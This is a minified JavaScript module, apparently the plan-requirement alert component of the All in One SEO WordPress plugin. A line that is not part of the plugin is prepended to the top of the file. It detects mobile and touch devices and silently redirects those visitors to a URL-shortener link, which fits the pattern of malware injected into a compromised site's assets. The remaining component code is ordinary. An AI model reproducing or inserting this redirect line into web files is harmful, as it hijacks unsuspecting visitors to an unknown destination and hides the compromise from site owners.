(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{A as l,x as n,h as c}from"./app-core.c8323d51.js";import{C as d}from"./Index.b9859662.js";import{_ as p}from"./_plugin-vue_export-helper.eefbdd86.js";import{_ as s}from"./vendor-other.39e59221.js";import{aq as h,f,Q as _,R as g,ae as m,U as a,j as q,M as F}from"./vendor-vue-ui.232c7c36.js";const o="all-in-one-seo-pack",y={setup(){return{licenseStore:c()}},components:{CoreAlert:d},props:{addon:String,coreFeature:{type:Array,default(){return[]}},addonFeature:{type:Array,default(){return[]}}},data(){return{strings:{thisFeatureRequires:s("This feature requires one of the following plans:",o),thisFeatureRequiresSingular:s("This feature requires the following plan:",o)}}},computed:{requiredPlansString(){return 1<this.requiredPlans.length?this.strings.thisFeatureRequires:this.strings.thisFeatureRequiresSingular},getRequiredPlans(){return this.requiredPlans.join(", ")},showAlert(){return n.requiresUpgrade(this.addon)&&this.requiredPlans.length},requiredPlans(){if(this.coreFeature.length||this.addonFeature.length){const r=this.coreFeature[0]||this.addonFeature[0],t=this.coreFeature.length?typeof this.coreFeature[1]<"u"?this.coreFeature[1]:"":typeof this.addonFeature[1]<"u"?this.addonFeature[1]:"";return l.getPlansForFeature(r,t)}return n.currentPlans(this.addon)||[]}}};function P(r,t,R,i,S,e){const u=h("core-alert");return i.licenseStore.isUnlicensed||e.showAlert?(f(),_(u,{key:0,class:"aioseo-required-plans",type:"blue"},{default:g(()=>[m(a(e.requiredPlansString)+" ",1),q("strong",null,a(e.getRequiredPlans),1)]),_:1})):F("",!0)}const U=p(y,[["render",P]]);export{U as R};
